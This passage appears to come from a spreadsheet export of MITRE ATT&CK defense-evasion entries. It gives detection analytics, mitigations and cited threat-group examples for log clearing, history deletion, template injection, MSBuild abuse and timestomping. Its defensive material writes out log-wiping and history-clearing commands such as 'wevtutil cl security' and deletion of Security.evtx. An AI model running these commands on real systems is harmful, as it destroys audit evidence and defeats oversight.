   FilePath LIKE '%ConsoleHost_history.txt%') OR
  (event_id == "4663" AND
   FilePath LIKE '%ConsoleHost_history.txt%' AND
   ObjectType == "File" AND
   (UserAccessList LIKE '%1537%' OR 
    UserAccessList LIKE '%DELETE%'))&lt;/code&gt;
File Modification
Monitor for changes made to command history files, such as ConsoleHost_history.txt, ~/.zsh_history, or ~/.bash_history, for unexpected modifications to contents, access permissions, and attributes.
&lt;h4&gt; Analytic 1 : Modification of access rights to command history files &lt;/h4&gt;
&lt;code&gt; suspicious_files = filter ProcessGuid, ProcessFilePath, UserName, FilePath where
  (event_id == "4663" AND
   FilePath LIKE '%ConsoleHost_history.txt%' AND
   ObjectType == "File" AND
   (UserAccessList LIKE '%1539%' or UserAccessList LIKE '%WRITE_DAC%')) OR
  (event_id == "4670" AND
   FilePath LIKE '%ConsoleHost_history.txt%' AND
   ObjectType == "File" AND
   (ObjectNewSd LIKE '%;FA%' OR
    ObjectNewSd LIKE '%;FW%' OR
    ObjectNewSd LIKE '%;BU%'))&lt;/code&gt;
User Account Authentication
Monitor for an attempts by a user to gain access to a network or computing resource, often by providing credentials via remote terminal services, that do not have a corresponding entry in a command history file.
Environment Variable Permissions
Making the environment variables associated with command history read only may ensure that the history is preserved.(Citation: Securing bash history)
Remote Data Storage
Forward logging of historical data to remote data store and centralized logging solution to preserve historical command line log data.
Restrict File and Directory Permissions
Preventing users from deleting or writing to certain files can stop adversaries from maliciously altering their &lt;code&gt;~/.bash_history&lt;/code&gt; or &lt;code&gt;ConsoleHost_history.txt&lt;/code&gt; files.
APT41
[APT41](https://attack.mitre.org/groups/G0096) attempted to remove evidence of some of its activity by deleting Bash histories.(Citation: FireEye APT41 Aug 2019)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has routinely deleted log files on a compromised router, including automatic log deletion through the use of the logrotate utility.(Citation: Kaspersky ThreatNeedle Feb 2021) 
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has removed mailbox export requests from compromised Exchange servers.(Citation: DFIR Report APT35 ProxyShell March 2022)
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has cleared command history with &lt;code&gt;history -c&lt;/code&gt;.(Citation: Trend Micro TeamTNT)(Citation: Cisco Talos Intelligence Group)
menuPass
[menuPass](https://attack.mitre.org/groups/G0045) has used [Wevtutil](https://attack.mitre.org/software/S0645) to remove PowerShell execution logs.(Citation: Securelist APT10 March 2021)
Hildegard
[Hildegard](https://attack.mitre.org/software/S0601) has used history -c to clear script shell logs.(Citation: Unit 42 Hildegard Malware)
Kobalos
[Kobalos](https://attack.mitre.org/software/S0641) can remove all command history on compromised hosts.(Citation: ESET Kobalos Feb 2021)	
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments to bypass security restrictions that limit the use of command-line interpreters. 
Process Creation
Monitor for newly constructed processes and/or command-lines that can be used instead of invoking cmd (i.e. pcalua.exe, winrs.exe, cscript/wscript.exe, hh.exe, or bash.exe)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) persistence mechanisms have used &lt;code&gt;forfiles.exe&lt;/code&gt; to execute .htm files.(Citation: Qualys LolZarus)
Forfiles
[Forfiles](https://attack.mitre.org/software/S0193) can be used to subvert controls and possibly conceal command execution by not directly invoking [cmd](https://attack.mitre.org/software/S0106).(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)
Revenge RAT
[Revenge RAT](https://attack.mitre.org/software/S0379) uses the [Forfiles](https://attack.mitre.org/software/S0193) utility to execute commands on the system.(Citation: Cofense RevengeRAT Feb 2019)
</t>
  </si>
  <si>
    <t xml:space="preserve">Network Connection Creation
Monitor for newly constructed network connections that are sent or received by untrusted hosts.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Process Creation
Analyze process behavior to determine if an Office application is performing actions, such as opening network connections, reading files, spawning abnormal child processes (ex: [PowerShell](https://attack.mitre.org/techniques/T1059/001)), or other suspicious actions that could relate to post-compromise behavior.
Antivirus/Antimalware
Network/Host intrusion prevention systems, antivirus, and detonation chambers can be employed to prevent documents from fetching and/or executing malicious payloads.(Citation: Anomali Template Injection MAR 2018)
Disable or Remove Feature or Program
Consider disabling Microsoft Office macros/active content to prevent the execution of malicious payloads in documents (Citation: Microsoft Disable Macros), though this setting may not mitigate the [Forced Authentication](https://attack.mitre.org/techniques/T1187) use for this technique.
Network Intrusion Prevention
Network/Host intrusion prevention systems, antivirus, and detonation chambers can be employed to prevent documents from fetching and/or executing malicious payloads.(Citation: Anomali Template Injection MAR 2018)
User Training
Train users to identify social engineering techniques and spearphishing emails that could be used to deliver malicious documents.
Frankenstein
During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors used trojanized documents that retrieved remote templates from an adversary-controlled website.(Citation: Talos Frankenstein June 2019)
Operation Dream Job
During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) used DOCX files to retrieve a malicious document template/DOTM file.(Citation: ClearSky Lazarus Aug 2020)(Citation: McAfee Lazarus Jul 2020)
APT28
[APT28](https://attack.mitre.org/groups/G0007) used weaponized Microsoft Word documents abusing the remote template function to retrieve a malicious macro. (Citation: Unit42 Sofacy Dec 2018)
Confucius
[Confucius](https://attack.mitre.org/groups/G0142) has used a weaponized Microsoft Word document with an embedded RTF exploit.(Citation: Uptycs Confucius APT Jan 2021)
DarkHydrus
[DarkHydrus](https://attack.mitre.org/groups/G0079) used an open-source tool, Phishery, to inject malicious remote template URLs into Microsoft Word documents and then sent them to victims to enable [Forced Authentication](https://attack.mitre.org/techniques/T1187).(Citation: Unit 42 Phishery Aug 2018)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has injected SMB URLs into malicious Word spearphishing attachments to initiate [Forced Authentication](https://attack.mitre.org/techniques/T1187).(Citation: US-CERT TA18-074A)
Gamaredon Group
[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used DOCX files to download malicious DOT document templates and has used RTF template injection to download malicious payloads.(Citation: Proofpoint RTF Injection) [Gamaredon Group](https://attack.mitre.org/groups/G0047) can also inject malicious macros or remote templates into documents already present on compromised systems.(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)(Citation: CERT-EE Gamaredon January 2021)(Citation: Microsoft Actinium February 2022)(Citation: Unit 42 Gamaredon February 2022)(Citation: Secureworks IRON TILDEN Profile)
Inception
[Inception](https://attack.mitre.org/groups/G0100) has used decoy documents to load malicious remote payloads via HTTP.(Citation: Unit 42 Inception November 2018)
Tropic Trooper
[Tropic Trooper](https://attack.mitre.org/groups/G0081) delivered malicious documents with the XLSX extension, typically used by OpenXML documents, but the file itself was actually an OLE (XLS) document.(Citation: Unit 42 Tropic Trooper Nov 2016)
Chaes
[Chaes](https://attack.mitre.org/software/S0631) changed the template target of the settings.xml file embedded in the Word document and populated that field with the downloaded URL of the next payload.(Citation: Cybereason Chaes Nov 2020) 
WarzoneRAT
[WarzoneRAT](https://attack.mitre.org/software/S0670) has been install via template injection through a malicious DLL embedded within a template RTF in a Word document.(Citation: Uptycs Confucius APT Jan 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
In environments using Exchange, monitor logs for the creation or modification of mail processing settings, such as transport rules.
Command Execution
Monitor executed commands and arguments that may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined emails. In Exchange environments, monitor for PowerShell cmdlets that may create or alter transport rules, such as `New-TransportRule` and `Set-TransportRule`.(Citation: Microsoft Manage Mail Flow Rules 2023)
File Deletion
Monitor for deletion of generated artifacts on a host system, including logs or captured files such as quarantined emails. 
On Windows 10, mail application data is stored in &lt;code&gt;C:\Users\Username\AppData\Local\Comms\Unistore\data&lt;/code&gt;. On Linux, mail data is stored in &lt;code&gt;/var/spool/mail&lt;/code&gt; or &lt;code&gt;/var/mail&lt;/code&gt;. On macOS, mail data is stored in &lt;code&gt;~/Library/Mail&lt;/code&gt;.
File Modification
Monitor for changes made to generated artifacts on a host system, including logs or captured files such as quarantined emails. 
On Windows 10, mail application data is stored in &lt;code&gt;C:\Users\Username\AppData\Local\Comms\Unistore\data&lt;/code&gt;. On Linux, mail data is stored in &lt;code&gt;/var/spool/mail&lt;/code&gt; or &lt;code&gt;/var/mail&lt;/code&gt;. On macOS, mail data is stored in &lt;code&gt;~/Library/Mail&lt;/code&gt;.
Process Creation
Monitor for newly executed processes with arguments that may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined emails.
Audit
In an Exchange environment, Administrators can use `Get-TransportRule` / `Remove-TransportRule` to discover and remove potentially malicious transport rules.(Citation: Microsoft Manage Mail Flow Rules 2023)
Remote Data Storage
Automatically forward mail data and events to a log server or data repository to prevent conditions in which the adversary can locate and manipulate data on the local system. When possible, minimize time delay on event reporting to avoid prolonged storage on the local system. 
Restrict File and Directory Permissions
Protect generated event files that are stored locally with proper permissions and authentication and limit opportunities for adversaries to increase privileges by preventing Privilege Escalation opportunities. 
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) removed evidence of email export requests using `Remove-MailboxExportRequest`.(Citation: Volexity SolarWinds)
Goopy
[Goopy](https://attack.mitre.org/software/S0477) has the ability to delete emails used for C2 once the content has been copied.(Citation: Cybereason Cobalt Kitty 2017)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.
Process Creation
Monitor for newly executed processes of MSBuild.exe. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity.
Trusted developer utilities such as MSBuild may be leveraged to run malicious code with elevated privileges. This analytic looks for any instances of msbuild.exe, which will execute any C# code placed within a given XML document; and msxsl.exe, which processes xsl transformation specifications for XML files and will execute a variaty of scripting languages contained within the XSL file. Both of these executables are rarely used outside of Visual Studio.
&lt;h4&gt;Analytic 1 - MSBuild and msxsl&lt;/h4&gt;
&lt;code&gt;target_processes = filter processes where (
  (exe="C:\Program Files (x86)\Microsoft Visual Studio\*\bin\MSBuild.exe" OR exe="C:\Windows\Microsoft.NET\Framework*\msbuild.exe" OR exe="C:\users\*\appdata\roaming\microsoft\msxsl.exe") AND
  image_path!="*Microsoft Visual Studio*")&lt;/code&gt;
Disable or Remove Feature or Program
MSBuild.exe may not be necessary within an environment and should be removed if not being used.
Execution Prevention
Use application control configured to block execution of &lt;code&gt;msbuild.exe&lt;/code&gt; if it is not required for a given system or network to prevent potential misuse by adversaries. For example, in Windows 10 and Windows Server 2016 and above, Windows Defender Application Control (WDAC) policy rules may be applied to block the &lt;code&gt;msbuild.exe&lt;/code&gt; application and to prevent abuse.(Citation: Microsoft WDAC)
Frankenstein
During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors used MSbuild to execute an actor-created file.(Citation: Talos Frankenstein June 2019)
Empire
[Empire](https://attack.mitre.org/software/S0363) can use built-in modules to abuse trusted utilities like MSBuild.exe.(Citation: Github PowerShell Empire)
PlugX
A version of [PlugX](https://attack.mitre.org/software/S0013) loads as shellcode within a .NET Framework project using msbuild.exe, presumably to bypass application control techniques.(Citation: Palo Alto PlugX June 2017)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments for actions that could be taken to remove or overwrite system logs.
File Deletion
Monitor for unexpected deletion of a system log file, typically stored in /var/logs or /Library/Logs. 
File Modification
Monitor for changes made to system log files, typically stored in  /var/log or /Library/Logs, for unexpected modifications to access permissions and attributes 
Encrypt Sensitive Information
Obfuscate/encrypt event files locally and in transit to avoid giving feedback to an adversary.
Remote Data Storage
Automatically forward events to a log server or data repository to prevent conditions in which the adversary can locate and manipulate data on the local system. When possible, minimize time delay on event reporting to avoid prolonged storage on the local system.
Restrict File and Directory Permissions
Protect generated event files that are stored locally with proper permissions and authentication and limit opportunities for adversaries to increase privileges by preventing Privilege Escalation opportunities.
Rocke
[Rocke](https://attack.mitre.org/groups/G0106) has cleared log files within the /var/log/ folder.(Citation: Anomali Rocke March 2019)
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has removed system logs from &lt;code&gt;/var/log/syslog&lt;/code&gt;.(Citation: Aqua TeamTNT August 2020)
MacMa
[MacMa](https://attack.mitre.org/software/S1016) can clear possible malware traces such as application logs.(Citation: ESET DazzleSpy Jan 2022)
Proton
[Proton](https://attack.mitre.org/software/S0279) removes logs from &lt;code&gt;/var/logs&lt;/code&gt; and &lt;code&gt;/Library/logs&lt;/code&gt;.(Citation: objsee mac malware 2017)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may delete or alter malicious network configuration settings as well as generated artifacts on a host system, including logs and files such as &lt;code&gt;Default.rdp&lt;/code&gt; or &lt;code&gt;/var/log/&lt;/code&gt;. 
File Modification
Monitor changes to files that may be indicators of deleting or altering malicious network configuration settings as well as generated artifacts on a host system that highlight network connection history, such as &lt;code&gt;Default.rdp&lt;/code&gt; or &lt;code&gt;/var/log/&lt;/code&gt;. 
Firewall Rule Modification
Monitor for changes made to firewall rules, especially unexpected modifications that may potentially be related to allowing and/or cleaning up previous tampering that enabled malicious network traffic.
Process Creation
Monitor created processes with arguments that may delete or alter malicious network configuration settings as well as generated artifacts that highlight network connection history on a host system -- which may include logs, files, or Registry values.
Windows Registry Key Modification
Monitor for changes to Registry keys (ex: &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default&lt;/code&gt;) and associated values that may be malicious attempts to conceal adversary network connection history.
Remote Data Storage
Automatically forward events to a log server or data repository to prevent conditions in which the adversary can locate and manipulate data on the local system. When possible, minimize time delay on event reporting to avoid prolonged storage on the local system.
Restrict Registry Permissions
Protect generated event files and logs that are stored locally with proper permissions and authentication and limit opportunities for adversaries to increase privileges by preventing Privilege Escalation opportunities.
Volt Typhoon
[Volt Typhoon](https://attack.mitre.org/groups/G1017) have inspected server logs to remove their IPs.(Citation: Secureworks BRONZE SILHOUETTE May 2023)
SUNBURST
[SUNBURST](https://attack.mitre.org/software/S0559) also removed the firewall rules it created during execution.(Citation: Microsoft Deep Dive Solorigate January 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may delete or alter generated artifacts associated with persistence on a host system.
File Deletion
Monitor for a file that may delete or alter generated artifacts associated with persistence on a host system.
File Modification
Monitor for changes made to a file may delete or alter generated artifacts associated with persistence on a host system.
Process Creation
Monitor for newly executed processes that may delete or alter generated artifacts associated with persistence on a host system. 
Scheduled Job Modification
Monitor for changes made to scheduled jobs that may attempt to remove artifacts on a host system.
User Account Deletion
Monitor for unexpected deletions of user accounts. Windows event logs may highlight activity associated with an adversary's attempt to remove an account (e.g., `Event ID 4726 - A user account was deleted`).
Alerting on these Event IDs may generate a high degree of false positives, so compare against baseline knowledge for how systems are typically used and correlate account modification events with other indications of malicious activity where possible.
Windows Registry Key Deletion
Monitor windows registry keys that may be deleted or alter generated artifacts associated with persistence on a host system. 
Windows Registry Key Modification
Monitor for changes made to windows registry keys or values that may delete or alter generated artifacts associated with persistence on a host system.
Remote Data Storage
Automatically forward events to a log server or data repository to prevent conditions in which the adversary can locate and manipulate data on the local system. When possible, minimize time delay on event reporting to avoid prolonged storage on the local system. 
Restrict File and Directory Permissions
Protect generated event files that are stored locally with proper permissions and authentication and limit opportunities for adversaries to increase privileges by preventing Privilege Escalation opportunities. 
Bazar
[Bazar](https://attack.mitre.org/software/S0534)'s loader can delete scheduled tasks created by a previous instance of the malware.(Citation: NCC Group Team9 June 2020)
GrimAgent
[GrimAgent](https://attack.mitre.org/software/S0632) can delete previously created tasks on a compromised host.(Citation: Group IB GrimAgent July 2021)
KOCTOPUS
[KOCTOPUS](https://attack.mitre.org/software/S0669) can delete created registry keys used for persistence as part of its cleanup procedure.(Citation: MalwareBytes LazyScripter Feb 2021)
MCMD
[MCMD](https://attack.mitre.org/software/S0500) has the ability to remove set Registry Keys, including those used for persistence.(Citation: Secureworks MCMD July 2019)
Misdat
[Misdat](https://attack.mitre.org/software/S0083) is capable of deleting Registry keys used for persistence.(Citation: Cylance Dust Storm)
Pillowmint
[Pillowmint](https://attack.mitre.org/software/S0517) can uninstall the malicious service from an infected machine.(Citation: Trustwave Pillowmint June 2020)
RTM
[RTM](https://attack.mitre.org/software/S0148) has the ability to remove Registry entries that it created for persistence.(Citation: ESET RTM Feb 2017)
S-Type
[S-Type](https://attack.mitre.org/software/S0085) has deleted accounts it has created.(Citation: Cylance Dust Storm)
SUNBURST
[SUNBURST](https://attack.mitre.org/software/S0559) removed IFEO registry values to clean up traces of persistence.(Citation: Microsoft Deep Dive Solorigate January 2021)
njRAT
[njRAT](https://attack.mitre.org/software/S0385) is capable of manipulating and deleting registry keys, including those used for persistence.(Citation: Trend Micro njRAT 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Correlating a user session with a distinct lack of new commands in their &lt;code&gt;.bash_history&lt;/code&gt; can be a clue to suspicious behavior. Monitor for modification of PowerShell command history settings through processes being created with &lt;code&gt;-HistorySaveStyle SaveNothing&lt;/code&gt; command-line arguments and use of the PowerShell commands &lt;code&gt;Set-PSReadlineOption -HistorySaveStyle SaveNothing&lt;/code&gt; and &lt;code&gt;Set-PSReadLineOption -HistorySavePath {File Path}&lt;/code&gt;. For network devices, monitor for missing or inconsistencies in Network Device CLI logging present in AAA logs as well as in specific RADIUS and TACAS+ logs.
Host Status
Users checking or changing their &lt;code&gt;HISTCONTROL&lt;/code&gt;, &lt;code&gt;HISTFILE&lt;/code&gt;, or &lt;code&gt;HISTFILESIZE&lt;/code&gt; environment variables may be suspicious.
Environment Variable Permissions
Prevent users from changing the &lt;code&gt;HISTCONTROL&lt;/code&gt;, &lt;code&gt;HISTFILE&lt;/code&gt;, and &lt;code&gt;HISTFILESIZE&lt;/code&gt; environment variables. (Citation: Securing bash history)
Operating System Configuration
Make sure that the &lt;code&gt;HISTCONTROL&lt;/code&gt; environment variable is set to “ignoredups” instead of “ignoreboth” or “ignorespace”.
APT38
[APT38](https://attack.mitre.org/groups/G0082) has prepended a space to all of their terminal commands to operate without leaving traces in the HISTCONTROL environment.(Citation: CISA AA20-239A BeagleBoyz August 2020)
SILENTTRINITY
[SILENTTRINITY](https://attack.mitre.org/software/S0692) can bypass ScriptBlock logging to execute unmanaged PowerShell code from memory.(Citation: GitHub SILENTTRINITY Modules July 2019)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments for actions that would delete Windows event logs (via PowerShell) such as &lt;code&gt;Remove-EventLog -LogName Security&lt;/code&gt;.
Note: Event ID 4104 (from the Microsoft-Windows-Powershell/Operational log) captures Powershell script blocks, which can be analyzed and used to detect on attempts to Clear Windows Event Logs. In particular, Powershell has a built-in Clear-EventLog cmdlet that allows for a specified log to be cleared. 
File Deletion
Monitor for unexpected deletion of Windows event logs (via native binaries) and may also generate an alterable event (Event ID 1102: "The audit log was cleared"). When an eventlog is cleared, a new event is created that alerts that the eventlog was cleared. For Security logs, its event code 1100 and 1102. For System logs, it is event code 104.
It is unlikely that event log data would be cleared during normal operations, and it is likely that malicious attackers may try to cover their tracks by clearing an event log. When an event log gets cleared, it is suspicious. 
1. This is often done using wevtutil, a legitimate tool provided by Microsoft. This action interferes with event collection and notification, and may lead to a security event going undetected, thereby potentially leading to further compromise of the network. 
2. Alerting when a Clear Event Log is generated could point to this intruder technique. Centrally collecting events has the added benefit of making it much harder for attackers to cover their tracks. Event Forwarding permits sources to forward multiple copies of a collected event to multiple collectors, thus enabling redundant event collection. Using a redundant event collection model can minimize the single point of failure risk. 
3. Attackers may set the option of the sources of events with &lt;code&gt;Limit-EventLog -LogName Security -OverflowAction DoNotOverwrite&lt;/code&gt; to not delete old Evenlog when the .evtx is full. By default the Security Log size is configured with the minimum value of 20 480KB (~23 000 EventLog). So if this option is enabled, all the new EventLogs will be automatically deleted. We can detect this behavior with the Security EventLog 1104. 
4. Attackers may delete .evtx with &lt;code&gt;del C:\Windows\System32\winevt\logs\Security.evtx&lt;/code&gt; or &lt;code&gt;Remove-Item C:\Windows\System32\winevt\logs\Security.evtx&lt;/code&gt; after having disabled and stopped the Eventlog service. As the EventLog service is disabled and stopped, the .evtx files are no longer used by this service and can be deleted. The new EventLog will be Unavailable until the configuration is reset. 
5. Attackers may use the powershell command &lt;code&gt;Remove-EventLog -LogName Security&lt;/code&gt; to unregister source of events that are part of Windows (Application, Security…). This command deletes the security EventLog (which also generates EventId 1102) but the new Eventlogs are still recorded until the system is rebooted . After the System is rebooted, the Security log is unregistered and doesn’t log any new Eventlog. However logs generated between the command and the reboot are still available in the .evtx file.
&lt;h4&gt;Analytic 1 - User Activity from Clearing Event Logs &lt;/h4&gt;
&lt;code&gt; cleared_logs = filter log_files where ((log_name = "Security") AND (event_id = "1100" OR event_id ="1102" OR event_id = "1104")) OR (log_name = "System" AND event_code = "104")&lt;/code&gt;
OS API Execution
Monitor for Windows API calls that may clear Windows Event Logs to hide the activity of an intrusion.
Process Creation
Monitor for newly executed processes that may clear Windows Event Logs to hide the activity of an intrusion. In an attempt to clear traces after compromising a machine, threat actors often try to clear Windows Event logs. This is often done using “wevtutil”, a legitimate tool provided by Microsoft. This action interferes with event collection and notification, and may lead to a security event going undetected, thereby potentially leading to further compromise of the network.
&lt;h4&gt;Analytic 1 - Clearing Windows Logs with Wevtutil&lt;/h4&gt;
&lt;code&gt;cleared_logs = filter processes where (event_id = “1” AND process_name = “*wevtutil*” AND cmd_line= "*cl*" &lt;/code&gt;
Encrypt Sensitive Information
Obfuscate/encrypt event files locally and in transit to avoid giving feedback to an adversary.
Remote Data Storage
Automatically forward events to a log server or data repository to prevent conditions in which the adversary can locate and manipulate data on the local system. When possible, minimize time delay on event reporting to avoid prolonged storage on the local system.
Restrict File and Directory Permissions
Protect generated event files that are stored locally with proper permissions and authentication and limit opportunities for adversaries to increase privileges by preventing Privilege Escalation opportunities.
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), the threat actors deleted all Windows system and security event logs using `/Q /c wevtutil cl system` and `/Q /c wevtutil cl security`.(Citation: FoxIT Wocao December 2019)
APT28
[APT28](https://attack.mitre.org/groups/G0007) has cleared event logs, including by using the commands &lt;code&gt;wevtutil cl System&lt;/code&gt; and &lt;code&gt;wevtutil cl Security&lt;/code&gt;.(Citation: Crowdstrike DNC June 2016)(Citation: DOJ GRU Indictment Jul 2018)
APT32
[APT32](https://attack.mitre.org/groups/G0050) has cleared select event log entries.(Citation: FireEye APT32 May 2017)
APT38
[APT38](https://attack.mitre.org/groups/G0082) clears Window Event logs and Sysmon logs from the system.(Citation: FireEye APT38 Oct 2018)
APT41
[APT41](https://attack.mitre.org/groups/G0096) attempted to remove evidence of some of its activity by clearing Windows security and system events.(Citation: FireEye APT41 Aug 2019)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has cleared event logs on compromised hosts.(Citation: NCC Group Chimera January 2021)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has cleared Windows event logs and other logs produced by tools they used, including system, security, terminal services, remote services, and audit logs. The actors also deleted specific Registry keys.(Citation: US-CERT TA18-074A)
FIN5
[FIN5](https://attack.mitre.org/groups/G0053) has cleared event logs from victims.(Citation: Mandiant FIN5 GrrCON Oct 2016)
FIN8
[FIN8](https://attack.mitre.org/groups/G0061) has cleared logs during post compromise cleanup activities.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)
Indrik Spider
[Indrik Spider](https://attack.mitre.org/groups/G0119) has used [Cobalt Strike](https://attack.mitre.org/software/S0154) to empty log files.(Citation: Symantec WastedLocker June 2020)
BlackCat
[BlackCat](https://attack.mitre.org/software/S1068) can clear Windows event logs using `wevtutil.exe`.(Citation: Microsoft BlackCat Jun 2022)
BlackEnergy
The [BlackEnergy](https://attack.mitre.org/software/S0089) component KillDisk is capable of deleting Windows Event Logs.(Citation: ESEST Black Energy Jan 2016)
FinFisher
[FinFisher](https://attack.mitre.org/software/S0182) clears the system event logs using &lt;code&gt; OpenEventLog/ClearEventLog APIs &lt;/code&gt;.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)
HermeticWiper
[HermeticWiper](https://attack.mitre.org/software/S0697) can overwrite the `C:\Windows\System32\winevt\Logs` file on a targeted system.(Citation: ESET Hermetic Wizard March 2022)
HermeticWizard
[HermeticWizard](https://attack.mitre.org/software/S0698) has the ability to use `wevtutil cl system` to clear event logs.(Citation: ESET Hermetic Wizard March 2022)
Hydraq
[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can clear all system event logs.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)
KillDisk
[KillDisk](https://attack.mitre.org/software/S0607) deletes Application, Security, Setup, and System Windows Event Logs.(Citation: ESEST Black Energy Jan 2016)
Lucifer
[Lucifer](https://attack.mitre.org/software/S0532) can clear and remove event logs.(Citation: Unit 42 Lucifer June 2020)
Mafalda
[Mafalda](https://attack.mitre.org/software/S1060) can delete Windows Event logs by invoking the `OpenEventLogW` and `ClearEventLogW` functions.(Citation: SentinelLabs Metador Sept 2022)
Meteor
[Meteor](https://attack.mitre.org/software/S0688) can use [Wevtutil](https://attack.mitre.org/software/S0645) to remove Security, System and Application Event Viewer logs.(Citation: Check Point Meteor Aug 2021)
NotPetya
[NotPetya](https://attack.mitre.org/software/S0368) uses &lt;code&gt;wevtutil&lt;/code&gt; to clear the Windows event logs.(Citation: Talos Nyetya June 2017)(Citation: US District Court Indictment GRU Unit 74455 October 2020)
Olympic Destroyer
[Olympic Destroyer](https://attack.mitre.org/software/S0365) will attempt to clear the System and Security event logs using &lt;code&gt;wevtutil&lt;/code&gt;.(Citation: Talos Olympic Destroyer 2018)
Pupy
[Pupy](https://attack.mitre.org/software/S0192) has a module to clear event logs with PowerShell.(Citation: GitHub Pupy)
RunningRAT
[RunningRAT](https://attack.mitre.org/software/S0253) contains code to clear event logs.(Citation: McAfee Gold Dragon)
SynAck
[SynAck](https://attack.mitre.org/software/S0242) clears event logs.(Citation: SecureList SynAck Doppelgänging May 2018)
Wevtutil
[Wevtutil](https://attack.mitre.org/software/S0645) can be used to clear system and security event logs from the system.(Citation: Wevtutil Microsoft Documentation)(Citation: Crowdstrike DNC June 2016)
ZxShell
[ZxShell](https://attack.mitre.org/software/S0412) has a command to clear system event logs.(Citation: Talos ZxShell Oct 2014) 
gh0st RAT
[gh0st RAT](https://attack.mitre.org/software/S0032) is able to wipe event logs.(Citation: FireEye Hacking Team)(Citation: Gh0stRAT ATT March 2019)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments of net use commands associated with establishing and removing remote shares over SMB, including following best practices for detection of Windows Admin Shares.
Network Traffic Content
Monitoring for SMB traffic between systems may also be captured and decoded to look for related network share session and file transfer activity.
Process Creation
Monitor for newly constructed processes and/or command line execution that can be used to remove network share connections via the net.exe process. 
Note: Event IDs are for Sysmon (Event ID 1 - process create) and Windows Security Log (Event ID 4688 - a new process has been created). The Analytic is oriented around looking for various methods of removing network shares via the command line, which is otherwise a rare event. 
&lt;h4&gt; Analytic 1: Network Share Connection Removal &lt;/h4&gt;
&lt;code&gt; target_processes = filter processes where (
  (event_id == "1" OR event_id == "4688") AND 
  (exe == "C:\Windows\System32\net.exe" AND command_line == "*delete*") OR
  command_line="*Remove-SmbShare*" OR
  command_line="*Remove-FileShare*" )&lt;/code&gt;
User Account Authentication
Monitoring for Windows authentication logs are also useful in determining when authenticated network shares are established and by which account, and can be used to correlate network share activity to other events to investigate potentially malicious activity.
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) has detached network shares after exfiltrating files, likely to evade detection.(Citation: SecureWorks BRONZE UNION June 2017)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) can disconnect previously connected remote drives.(Citation: ESET InvisiMole June 2018)
Net
The &lt;code&gt;net use \\system\share /delete&lt;/code&gt; command can be used in [Net](https://attack.mitre.org/software/S0039) to remove an established connection to a network share.(Citation: Technet Net Use)
RobbinHood
[RobbinHood](https://attack.mitre.org/software/S0400) disconnects all network shares from the computer with the command &lt;code&gt;net use * /DELETE /Y&lt;/code&gt;.(Citation: CarbonBlack RobbinHood May 2019)
</t>
  </si>
  <si>
    <t xml:space="preserve">File Metadata
Monitor for file modifications that collects information on file handle opens and can compare timestamp values
File Modification
Monitor for unexpected modifications to file timestamps 
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) modified timestamps of backdoors to match legitimate Windows files.(Citation: Microsoft Deep Dive Solorigate January 2021)
APT28
[APT28](https://attack.mitre.org/groups/G0007) has performed timestomping on victim files.(Citation: Crowdstrike DNC June 2016)
APT29
[APT29](https://attack.mitre.org/groups/G0016) has used timestomping to alter the Standard Information timestamps on their web shells to match other files in the same directory.(Citation: Mandiant APT29 Eye Spy Email Nov 22)
APT32
[APT32](https://attack.mitre.org/groups/G0050) has used scheduled task raw XML with a backdated timestamp of June 2, 2016. The group has also set the creation time of the files dropped by the second stage of the exploit to match the creation time of kernel32.dll. Additionally, [APT32](https://attack.mitre.org/groups/G0050) has used a random value to modify the timestamp of the file storing the clientID.(Citation: FireEye APT32 May 2017)(Citation: ESET OceanLotus Mar 2019)(Citation: ESET OceanLotus macOS April 2019)
APT38
[APT38](https://attack.mitre.org/groups/G0082) has modified data timestamps to mimic files that are in the same folder on a compromised host.(Citation: CISA AA20-239A BeagleBoyz August 2020)
Chimera
